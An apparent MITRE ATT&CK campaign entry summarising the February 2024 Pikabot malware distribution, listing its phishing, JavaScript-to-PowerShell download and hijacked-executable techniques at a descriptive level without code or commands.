Pikabot Distribution February 2024

Pikabot was distributed in Pikabot Distribution February 2024 using malicious emails with embedded links leading to malicious ZIP archives requiring user interaction for follow-on infection. The version of Pikabot distributed featured significant changes over the 2023 variant, including reduced code complexity and simplified obfuscation mechanisms.[1][2]

ID: C0036
First Seen:  February 2024 [1]
Last Seen:  February 2024 [1]
Contributors: Inna Danilevich, U.S. Bank
Version: 1.0
Created: 17 July 2024
Last Modified: 28 October 2024

Techniques Used

Domain ID Name Use
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Pikabot Distribution February 2024 passed execution from obfuscated JavaScript files to PowerShell scripts to download and install Pikabot.[1]

.007 Command and Scripting Interpreter: JavaScript

Pikabot Distribution February 2024 utilized obfuscated JavaScript files for initial Pikabot payload download.[1]

Enterprise T1574 Hijack Execution Flow

Pikabot Distribution February 2024 utilized a tampered legitimate executable, grepWinNP3.exe, for its first stage Pikabot loader, modifying the open-source tool to execute malicious code when launched.[1]

Enterprise T1566 .002 Phishing: Spearphishing Link

Pikabot Distribution February 2024 utilized emails with hyperlinks leading to malicious ZIP archive files containing scripts to download and install Pikabot.[1]

Software

ID Name Description
S1145 Pikabot

Pikabot Distribution February 2024 distributed Pikabot for initial access purposes in February 2024.[1][2]

References